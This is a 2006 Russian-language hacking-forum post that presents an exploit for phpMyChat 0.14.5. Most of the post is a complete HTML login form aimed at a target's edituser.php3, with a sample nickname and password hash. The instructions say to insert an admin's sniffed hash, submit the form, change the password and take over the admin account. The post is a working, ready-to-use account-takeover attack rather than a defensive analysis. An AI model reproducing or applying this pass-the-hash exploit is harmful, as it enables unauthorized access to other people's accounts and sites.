ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу уязвимость в phpMyChat 0.14.5
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

уязвимость в phpMyChat 0.14.5
  #1  
Старый 02.04.2006, 02:46
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию уязвимость в phpMyChat 0.14.5
Привет! Я нашел уязвимость в phpMyChat 0.14.5 ,и более поздние версии (может ее и до меня нашли, но вроде я таких уязвимостей не встречал). Суть в том: можно изменить пасс админу (любому пользователю), можно зайти под него ником в чат.
Для этого надо знать его ник и хеш (хеш не надо расшифровывать).
Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">

<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
	window.focus();
	document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>

<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<BR>
<FORM ACTION="http://www.site.ru/chat/edituser.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="1">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
	<TD ALIGN="CENTER">
		<TABLE BORDER=0>
		<TR>
			<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Ник :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Pr13raK" CLASS="ChatBox">
			</TD>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="310dcbbf4cce62f762a2aaa148d556bd" CLASS="ChatBox">
			</TD>
		</TR>
		</TABLE>
		<P>
		<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
	</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>

</HTML>
Для этого в поле:<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его ник.
В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш.
Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите kalnin2006@yandex.ru или стучите в асю: 255553398.
Извините если что не понятно это моя первая уязвимость!!!
"The pirats of a network" www.pirats.jino-net.ru
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpMyChat 0.14.5 Grema Чаты 4 05.01.2006 11:46
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46
Phpmychat 0.14.5 Чаты 0 26.06.2004 11:05
Phpmychat 0.14.5 Уязвимости 0 26.06.2004 11:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ